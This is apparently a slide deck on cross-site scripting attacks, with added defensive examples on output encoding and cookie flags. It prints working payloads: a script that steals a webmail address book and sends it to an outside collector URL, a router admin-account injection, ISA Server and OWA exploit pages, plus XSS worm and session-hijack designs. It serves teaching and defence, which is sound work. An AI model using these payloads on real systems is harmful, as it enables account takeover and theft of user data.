2. Guideline
Introduction
XSS Today
Let’s see some XSS
Infohacking Research 2 Not O
3. Introduction
What’s this?
XSS?
How it works
Where it works
Application level security
OK, but it's only an XSS
4. XSS (common attacks)
XSS happens when somebody can use user-controlled input to make the application return a response it did not intend.
The error is usually due to poor filtering of user input and/or of the output of dynamically generated pages.
This can give access to something restricted to the user, for example session credentials (cookies, session IDs, etc.).
5. How it works
The attacker must trick the victim into making a specially crafted HTTP request.
Usually exploited in web environments:
1) Webmails
2) Web forums
3) Any web application (dynamic content) that allows user interaction
Also other applications that render some output as HTML (log viewers, mail clients): "HTML injection" (like ILLC techniques).
It exploits an insecure programming methodology.
The attacker usually wants the victim to do something:
Send out some cookie (session or permanent)
Make an HTTP request for you ;)
The goal of XSS: we are in the victim's environment.
6. How it works, example
We find a flaw on a server (e.g. an online bank with an email service).
We construct a special request that exploits this flaw (XSS) and obtains the user's credentials.
We send a message to the victim (with window.open, img src, etc.).
We wait for the user to open it and collect the session tracking cookie.
We access the online bank with the user's credentials (the stolen cookie).
Now we are this user, for a while.
7. Where it works
Any dynamically generated content that depends on the user's input is a potential XSS security hole.
Enter your name: Toni
Hi Toni
Simple example of exploitation on a dynamic page:
Enter your name: Toni<script>alert('Hello XSS')</script>
Hi Toni
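The "Enter your name" page above, as an added example that is not part of the original slides: the vulnerable reflection is written next to the output-encoded version so the difference can be observed. The `name` query parameter and the `handleRequest` helper are assumptions made for the example; only the `<script>alert('Hello XSS')</script>` payload comes from the slide.

```javascript
// Added example (not from the Infohacking slides): the "Hi <name>" page,
// once reflecting user input verbatim and once encoding it for the HTML
// element context. The "name" query parameter is an assumption.

// Minimal HTML entity encoding for text placed inside an element body.
// Attribute and JavaScript contexts need their own, stricter encoders.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the user's input is copied verbatim into the generated page.
function renderGreetingVulnerable(name) {
  return `<html><body>Hi ${name}</body></html>`;
}

// Hardened: the same page with the input encoded for the element context.
function renderGreetingSafe(name) {
  return `<html><body>Hi ${escapeHtml(name)}</body></html>`;
}

// Crude check used only to make the difference observable: is there a
// script element in the page that the server did not put there?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Request handler for "GET /?name=Toni" (the "name" parameter is assumed).
// The second argument selects the vulnerable rendering for demonstration.
function handleRequest(rawUrl, vulnerable = false) {
  const url = new URL(rawUrl, "http://localhost");
  const name = url.searchParams.get("name") || "";
  return vulnerable ? renderGreetingVulnerable(name) : renderGreetingSafe(name);
}

// Walk-through with the payload from the slide.
const PAYLOAD = "Toni<script>alert('Hello XSS')</script>";
console.log("vulnerable:", renderGreetingVulnerable(PAYLOAD));
console.log("safe:      ", renderGreetingSafe(PAYLOAD));
```

The encoding is context specific: `escapeHtml` is correct for text between tags, but the same input dropped into an attribute value, a URL or a script block needs the encoder for that context, which is why "filter the input" alone, as the slides later note, is never enough.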
8. Application level security
Nowadays application level security is one of the main challenges in computing.
Application level firewalls like HIVE, or layer 7 filters.
Client side security is out of the webmaster's control.
Servers can only do their best to filter any data coming from the client side.
Fact: most XSS based attacks and vulnerabilities are easy to exploit.
No special skills are needed -> script kiddies.
XSS is useful to impersonate a user but doesn't provide a direct or easy way of controlling a computer... umm, well, you can still do a lot of things ;-)
9. OK, but it's only an XSS...
Yes, XSS attacks seem harmless by themselves, but they can open other attack vectors.
We can gain access to a web admin tool.
(IIS 6.0 Web Admin XSS vulnerability)
XSS breaks the old HTTP session tracking methods: IDs in the URL, cookies, and also source IP based authentication.
(iPlanet Messaging Server XSS vulnerability)
Combining XSS with other flaws to launch a more complex attack:
- Hotmail XSS and AV bypass
- Microsoft user domain credentials access via OWA XSS (via XST)
10. XSS today
XSS, next generation attacks.
Proof of concept: HTTP redirection
XSS based worms & trojans
XSS worm
XSS trojan
Anyone could be affected by XSS
11. XSS next generation attacks
HTTP response redirection (information leak)
(Zeus Web Admin XSS)
HTTP bouncing (fully interactive)
… under construction
12. Proof of concept: HTTP redirection
Example of an evil link that steals the address book of the victim's webmail (URL-encoded, as it would be sent):
http://<target>/vulnerable.cgi?variable=<script>function%20pedo(){var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","http://<target>/address_book.cgi",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;window.open("http://www.infohacking.com/data_collector.php?response="+xmlDoc);} pedo();</script>
13. HTTP redirection, decoded
Which means:
http://<target>/vulnerable.cgi?variable= (server path where the script is injected)
<script>
function pedo()
{var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); // IE-only XMLHTTP object of the time
xmlHttp.open("GET","http://<target>/address_book.cgi",false); // MAKE REQUEST (same origin as the vulnerable page, so the script may read the answer)
xmlHttp.send();
xmlDoc=xmlHttp.responseText; // STORE RESPONSE
window.open("http://<attacker_site>/"+xmlDoc);} // SEND RESPONSE TO ATTACKER (carried in the URL of a navigation, which the browser does not restrict)
pedo();
</script>
Note: we use "window.open" to send the response in order to bypass the "xmlHttp.open" security restrictions: the injected script can only read responses from the domain it runs in (same-origin policy), but it can navigate to any URL, so the stolen data travels to the attacker inside that URL. The same pattern works today with XMLHttpRequest or fetch for the same-origin read plus an image or navigation request for the exfiltration; ActiveXObject only exists in old Internet Explorer.
14. XSS based worms & trojans
General "features"
Spread through webmail servers
Self decrypting script routine
Can modify permanent cookies (trojan)
Can force session logout (DoS)
Can impersonate the user
Can steal information (mail content, address book, etc.)
Hard to detect by AV software (encrypted payload)
If no user action is needed (e.g. XSS in some field of the mail itself), the spreading will be very fast!
15. XSS worm
How it works:
Once executed, the script decrypts itself and tries to detect the source (Hotmail, Yahoo, Terra, …) or the webmail software (iPlanet, etc.). This can be done with a simple "document.URL", compared against some patterns.
If the source is known, try to get the address book.
Keep only webmail addresses.
Auto-send routine.
16. XSS trojan
How it works:
Once executed, the script decrypts itself and tries to set a permanent cookie (which will be stored on the victim's hard disk).
The modified cookie could change some option: it can set Chinese as the default language ;-) (DoS).
The modified cookie could redirect the victim to some place on the server that is controlled by the attacker (by changing some profile setting in the cookie).
Like worms, trojans could try to spread...
17. Anyone can be affected by XSS
Recent example: ViewCVS.py
Affected sites: SourceForge.net, Apache.org, Iptables.org.
Those sites are well known to everybody, and they are probably managed by security-conscious people...
... anyway, they can still be exposed to XSS risks...
21. XSS examples
Some XSS examples from Infohacking Research:
3Com 812 ADSL router -> we add a new admin
Inktomi Traffic Server -> all users behind it are vulnerable to this XSS
iPlanet Messaging Server -> session hijack
Microsoft ISA Server -> XSS through the Via header
OWA XSS -> access to user credentials
22. XSS on 3Com ADSL router
There are a lot of XSS flaws in the OCR812:
http://<ip_of_OCR812>/<script>document.write("<b>WE_CAN_INJECT_CODE</b>")</script>
23. XSS on 3Com ADSL router
With XSS we can insert new users into our router.
We can use window.open, or <img src=...>, to make our special request (the fragment below is the path as it appears inside the injected JavaScript string):
/Forms/admin_telnet_add"+String.fromCharCode(63)+"uumUserName=infohacking&uumUserPassword=
String.fromCharCode(63) evaluates to "?" at run time, so the question mark never has to appear literally in the injected string.
24. XSS on 3Com ADSL router
We can do the complete process if we know the IP, user and password (for example, the old admin's):
<html>
<img src="<ip_or_name_of_OCR812>/legalizacion_marihuana.jpg">
<script type="text/javascript">
var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP") // IE-only XMLHTTP object
xmlHttp.open("GET", "<YOUR_FUCKING_REQUEST>", false) // e.g. the admin_telnet_add URL from the previous slide
xmlHttp.setRequestHeader("Authorization", "Basic <base64(user:password)>") // the router's HTTP Basic auth
xmlHttp.send()
</script>
</html>
25. Inktomi Traffic Server XSS
Inktomi Traffic Server is a proxy cache used by ISPs in several countries.
Also known in Spain as "Proxy cache de Telefónica".
A special request by a client passing through the Inktomi Traffic Server causes an error page generated by the proxy. This dynamic error page is vulnerable to Cross Site Scripting...
Indirectly, any server whose clients come through the Traffic Server and that uses cookies to track sessions is "vulnerable".
The client making the request IS UNABLE to distinguish which domain generated this code...
26. Inktomi Traffic Server XSS
Exploit?
We tested it on version 5.5.1.
You only need to configure the browser to use a proxy on ANY IP with port 80.
Make a special request:
http://<spoofed_domain>:443/</em><script>alert()</script>
We can see the script executed in our browser, "generated" by the spoofed domain: the browser attributes the proxy's error page to <spoofed_domain>, so the script runs in that domain's context. Now we can access its cookies and everything else, like in a man in the middle attack.
27. iPlanet Messaging Server XSS
This webmail, iPlanet Messaging Server, lets us hijack the SID.
The server allows "online" opening of file attachments. This means that any HTML file will be opened by the client browser in the iPlanet webmail domain context. Wonderful XSS ;-)
Now we can exploit this XSS with an HTML attachment.
With document.URL we obtain the SID and user id (located in the URL).
With the SID, we gain access to all attachments:
http://<iplanet_host>/attach/file.html?sid=XYXYXYXYXYXYXY&mbox=INBOX&uid=XXXXX&number=2&filename=file.html
28. iPlanet Messaging Server XSS
But this is not easy... iPlanet webmail includes IP based session tracking.
When can we use the hijacked SID?
If we are near the victim, behind the same NAT device, we can access with his SID.
We can steal the session of anyone who accesses through a transparent proxy (all its clients share the proxy's source IP).
Or we can create a script that forces the user to make the requests and redirects the results to us. Of course... they don't see anything... (see above)
Note: a lot of web servers use the same session cookie on both the http and https domains, so the cookie also travels over plain http. (This note is for online banking developers.)
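A check for the note above, added here as an example that is not part of the original slides: it parses Set-Cookie headers and flags session cookies that would be sent over plain http (no Secure attribute). It also reports cookies that script can read through document.cookie (no HttpOnly attribute, a mitigation that is not discussed in the slides). The sample headers are constructed for the example; the session-name heuristic is an assumption.

```javascript
// Added example (not from the Infohacking slides): audit Set-Cookie headers
// for session cookies missing Secure (sent over http too) or HttpOnly
// (readable from document.cookie, i.e. by an injected script).

// Parse one Set-Cookie header value into name, value and attributes.
function parseSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf("=");
  const cookie = {
    name: eq === -1 ? parts[0] : parts[0].slice(0, eq),
    value: eq === -1 ? "" : parts[0].slice(eq + 1),
    secure: false,
    httpOnly: false,
    attrs: {},
  };
  for (const attr of parts.slice(1)) {
    const [k, ...v] = attr.split("=");
    const key = k.trim().toLowerCase();
    if (key === "secure") cookie.secure = true;
    else if (key === "httponly") cookie.httpOnly = true;
    else cookie.attrs[key] = v.join("=").trim();
  }
  return cookie;
}

// Heuristic (assumption): cookie names that usually carry a session identifier.
const SESSION_NAME = /sess|sid|jsessionid|phpsessid|aspsessionid|auth|token/i;

// Return a list of findings for one header; empty means nothing to report.
function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (SESSION_NAME.test(c.name)) {
    if (!c.secure) findings.push(`${c.name}: missing Secure (sent over http and https alike)`);
    if (!c.httpOnly) findings.push(`${c.name}: missing HttpOnly (readable from document.cookie)`);
  }
  return findings;
}

// Constructed sample headers: an iPlanet-style SID without any attribute,
// a properly protected session cookie, and a harmless preference cookie.
const SAMPLE_HEADERS = [
  "SID=XYXYXYXYXYXYXY; path=/",
  "JSESSIONID=ABC123; Path=/; Secure; HttpOnly",
  "lang=es; Expires=Wed, 01 Jan 2025 00:00:00 GMT",
];

function auditAll(headers = SAMPLE_HEADERS) {
  return headers.flatMap(auditSetCookie);
}

for (const f of auditAll()) console.log(f);
```

In practice the headers come from the server's responses (curl -I against the https login page is enough); any session cookie without Secure is exactly the "same cookie on http and https" case the note warns about, and without HttpOnly it is the value the injected scripts on these slides read and send away.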
29. Microsoft ISA Server XSS
This example shows an XSS exploited through HTTP headers.
When we try to reach an unreachable URL through ISA Server, ISA generates an error page showing some data (including the content of the "Via" header).
We set this header ourselves.
Now we can request a non-existent URL in an existing domain (usually the server uses the same cookie for its whole domain).
Steal cookies.
Access.
We don't need a flaw in the server's code: use ISA Server instead.
30. ISA Server exploit
<html>
<body>
<script type="text/javascript">
alert("Click OK then wait for a few seconds...")
var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP") // IE-only XMLHTTP object
// a URL the proxy cannot reach, so ISA answers with its own error page
xmlHttp.open("GET", "http://www.infohacking.com:113", false)
// the error page echoes the Via header unfiltered; "</scr"+"ipt>" keeps the HTML
// parser from ending this script element early, and the inner quotes are escaped
xmlHttp.setRequestHeader("Via", "CODE_INJECTED_IN_VIA_HEADER<script>alert(\"ISA_SERVER_XSS_by_INFOHACKING\")</scr"+"ipt>")
xmlHttp.send()
xmlDoc=xmlHttp.responseText
document.write(xmlDoc) // render the proxy's error page, which runs the injected script
</script>
</body>
</html>
Caveat: current browsers refuse to let script set the Via header (it is on the forbidden request header list), so this particular delivery only worked from the XMLHTTP object of that era; the underlying flaw, an error page that reflects request headers unencoded, is unchanged.
31. OWA XSS
What do we have here?
With OWA you can view an HTML formatted e-mail.
A user must click a special link for this purpose in the webmail interface, and an alert will pop up.
To prevent people from executing malicious content in the client browser, OWA tries to filter the content of the mail.
Good, but... not enough.
32. Disabling OWA filtering
The URL to view an HTML formatted mail looks like this:
http://<IP_or_name_of_the_server>/exchange/<username>/<inbox_name>/<subject>.EML/1_multipart/2_text.htm?Security=1
Good name for a parameter; another name could have been "change_this_for_fucking_us".
We only need to remove this parameter, and OWA doesn't apply the filter.
33. OWA XSS
Obtaining the data to create our special link.
We need the IP or hostname of the server, the user name and the subject.
All of this can be found in the "Referer" header of an HTTP request coming from a link in the body of a message:
<img src="http://<site_of_the_attacker>/">
Now, with the Referer, we can send our attack:
We have the IP or hostname of the server (from the Referer)
We have the user name (from the Referer)
We know the subject (we sent the message)
We create a link in the body of a message without the "Security" parameter (a link to the same message, minus the Security parameter).
34. OWA, stolen credentials
Nothing else?
OWA uses cookies to track the HTTP session, but also uses "Basic Auth" for... more security? ;-)
This "Basic Auth" header (-> base64 encoded user:passwd) contains the user's credentials for this domain.
To access the "Basic Auth" header, the easiest way is an HTTP "TRACE" request (the server echoes the request back, headers included; this is the XST technique), and IIS (Internet Information Server) by default allows those kinds of requests.
35. XSS
That's all folks??
Of course, as always, the attacker's imagination is the only limit... much more fun is possible.
Thanks for your attention.